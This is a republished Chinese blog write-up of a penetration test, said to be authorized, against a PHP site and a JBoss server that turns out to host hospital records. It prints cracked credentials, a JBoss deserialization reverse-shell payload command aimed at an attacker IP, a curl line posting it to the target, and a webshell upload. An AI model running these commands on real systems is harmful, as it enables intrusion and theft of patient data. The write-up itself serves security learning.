php网站渗透实战_记一次渗透实战 - Azeng呐的个人空间 - OSCHINA - 中文开源技术交流社区...

最新推荐文章于 2024-05-05 03:54:20 发布
最新推荐文章于 2024-05-05 03:54:20 发布
阅读量299 收藏 1
点赞数
文章标签: php网站渗透实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29192141/article/details/112836577
版权

点击蓝字

关注我们

目标:http://xxx.xx.xxx.xxx:9002/xxx/xxm/login.php

访问目标

此时此刻,拿出我们拿出好兄弟burp来抓包,看下响应包

尝试枚举,看能不能碰到狗屎运

跑中国人名字典,无结果,表示今天运气不行啊

废话不多说继续!!!

常规操作 ,对目标目录进行删减 ,发现了目录遍历的漏洞

http://xxx.xx.xxx.xx:9002/xxxying/

尝试能不能获取有用的信息

随意点击,爆出路径,为后面上传webshell 做铺垫

之后发现了数据库的文件

发现了两个账号

http://xxx.xx.xxx.xx:9002/xxxxxx/tdb.20xxx129.sql

还发现了两个账号

对密码进行解密

admin/12345678

coolfd/shj811004

获得两个账号 ,尝试登陆

发现两个账号不可用 ,可能是另外一个系统的吧

继续搞呗

找到一个网站

http://www.xxxxxxx.cc/index.html

试试有没有后台

http://www.xxxxxxx.cc/admin/login.php#

http://www.xxxxx.com/

http://www.xxxxxxx.com/admin/login.php#

尝试登陆后台 ,发现coolfd账号可用

登陆后台了

尝试找上传点

上传多次无果

/mxxxxtor/atxxxxd/image/20xxx923/20140xxxx11623_39094.jpg

多处

没有写权限

多处上传失败

只能搞ip

对目标ip进行端口扫描

逐个访问,发现了jboss

http://xxx.xx.xxx.xx:9080/

想到jboss 反序列化漏洞

在网上找了反序列化的exp

将payload生成好了,直接使用

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 182.92.*.*7777

监听端口

curl  http://xxx.xx.x.xx:9080/ixxxxx/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

向目标路径/invoker/readonly

即可拿到目标的最高权限

找到网站路径

发现了PHPinfo探针

http://xxx.xx.xxx.xx:9002/phpinfo.php

好像无法使用下载命令

Curl wget

只能用打包好的工具上传webshell了

6哥工具执行好像乱码了

只好上传冰蝎木马上去

知道路径 直接上传

为了便于管理,上传一个webshell

在文件管理看到了数据库文件

发现了账号和密码

解密成功,后台登陆成功

看起来是医院的系统

个人病例信息大量泄露

http://xxx.xx.x.xx:9002/zhxxxxg/rxxpg/35735xxxxx80%94369773.jpg

部分报告单泄露

为了安全起见,将木马已经删除了

似乎存在域环境

可惜自己菜,未敢深入

到这里就结束了,授权项目,如有打码不规范,请勿私自渗透,违者后果自负

喜欢的表哥点个关注+再看呗

天珊雪
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP基础学习【针对渗透】
m0_55854679的博客
12-11 1309
PHP基础教程 PHP属于后端语言,后端的核心在于与数据库交互。 常见的后端语言:ASP、ASPX、PHP、JSP 什么是PHPPHP(超文本预处理器)是一种通用开源脚本语言,是动态语言的一种,动态语言还包括ASP、ASPX、JSP。 PHP语法吸收了C、java、Perl的特点,主要用于web开发领域。 PHP可以将程序嵌入到前端代码(HTML、CSS、JS)执行。 PHP支持几乎所有流行的数据库以及操作系统。 基本语法 PHP头部标风格 <?php ?> <script
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1925
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
【实战案例】——实战渗透某不法网站
热门推荐
Demo不是emo的博客
11-21 2万+
新开了一个专栏介绍博主遇到的一些比较有意思的实战环境和渗透流程,希望对大家有所帮助
【网络安全】网站站点渗透实战
jazzz98的博客
04-10 1554
【网络安全】一次网站站点渗透
【网络安全】一次红队渗透实战项目_渗透测试红队
wangluoanquan111的博客
06-16 1309
信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用 nmap 来演示信息收集。
网络安全之渗透实战学习
xv7676的博客
05-25 331
对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:1、使用Kerbeors认证或SMB签名;2、禁用共享文件给未认证用户所提供的写入权限;3、确保使用的是NTLMv2密码并增加口令的复杂程度。
ctfshow-探针泄露
qq_47804678的博客
03-02 1208
实际上是一种Web脚本程序,主要是用来探测虚拟空间、服务器的运行状况,而本质上是通过PHP语言实现探测PHP服务器敏感信息的脚本文件,通常用于探测网站目录、服务器操作系统、PHP版本、数据库版本、CPU、内存、组件支持等,基本能够很全面的了解服务器的各项信息。可以看到有这个文件,我们按照路径访问,可以看到探针的页面,里面可以试试查看到服务器硬盘资源、内存占用、网卡流量、系统负载、系统时间等信息。对于测试用的探针,使用完毕后要及时删除,可能会造成信息泄露。这个题中指的就是PHP探针。
WEB渗透—PHP反序列化(十一)
haosha。的博客
12-31 1432
Web渗透—PHP反序列化课程学习分享(课程非本人制作,仅提供学习分享)
渗透测试及一些网络安全类的讨论社区类的整理
宝藏女孩的成长日记
03-21 2892
渗透测试(Penetration Testing)是一种网络安全评估技术,通过模拟黑客攻击的方式,评估目标系统的安全性能,发现并利用系统漏洞,最终提供针对性的安全建议。渗透测试旨在帮助组织发现并修补网络中存在的安全漏洞,以提高组织的安全性能。
干货丨渗透测试常用方法总结,大神之笔!
youmaob的博客
12-08 205
干货丨渗透测试常用方法总结,大神之笔!
完整的内网渗透实验
balalawb的博客
11-07 378
内网渗透
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
04-14 3871
内网渗透-实战|手把手教你如何进行内网渗透
一次针对某诈骗网站渗透实战
2201_75934622的博客
12-20 1240
这是在CSDN发的第二篇文章,上一篇是针对客户端的渗透测试,这一次是对某诈骗网站进行渗透测试,希望各位大佬不吝赐教!
一次网络安全渗透测试实战指南
kali_Ma的博客
10-25 4555
基于一次授权的渗透把一些思路整理一下,本次的重点在以洞打洞原则发现一个小洞顺藤摸瓜发现更多的高危甚至严重问题,像我们日常渗透有这样一步步思路进行收获都不小,当然了运气可以省很大部分时间和心思,一步到位的欧皇也是存在。
渗透测试神器合集
m0_49936858的博客
08-19 1385
xray 1.9.1 - 漏洞捕获神器、Acunetix 14.9.220713150 - 扫描器领军者、fscan 1.9 - 内网重型武器、Kscan 1.8 - 资产测绘工具。
网站渗透实战试验(仅供参考)
amaoatao的博客
03-10 5705
首先收集必要的信息 发现存在php探针,phpinfo,phpmyadmin 常用的垃圾弱口令登录失败。 尝试登录后台,网站使用帝国cms7.2系统 弱口令登录失败,使用网络上帝国cms的通用漏洞,行不通失败。 在知道绝对路径的情况下,dba权限的sql注入可以直接执行os-shell命令拿shell(下载帝国下来看!)。 扫描开放端口,反查域名,寻找最可能存在sql注入的网站。...
【设计思想解读开源框架,php探针存在xss漏洞,面试资料分享
weixin_57485542的博客
04-07 482
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
最新发布
2401_84264244的博客
05-05 387
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
web安全攻防渗透测试实战指南_web安全攻防渗透测试实战指南
heike_Ch的博客
04-24 685
1. Nmap的基本Nmap + ip 6+ ipNmap -A 开启操作系统识别和版本识别功能– T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现-v 显示信息的级别,-vv显示更详细的信息192.168.1.1/24 扫描C段 192.168.11 -254 =上nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) 位置 : nmap安装目录/scripts/ 例如/usr/share/nmap/scripts脚本类型:ll /usr/sh
网络安全渗透实战详细详解
yi152787的博客
11-14 1万+
第一篇在此平台发布实战内容,有多处不足请多指教,本次内容详解ms14-064漏洞利用与加固。 任务环境说明: 渗透机:Kali Linux 靶机:Microsoft Windows XP 渗透机IP:172.16.7.122 靶机IP:172.16.7.120 实验步骤实战 1.打开网络拓扑 进入msfconsole渗透测试平台 2.输入命令 search ms14-064 搜索模块,并用use 调节 输入此下面红色模块 3.输入 show options查看配置.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值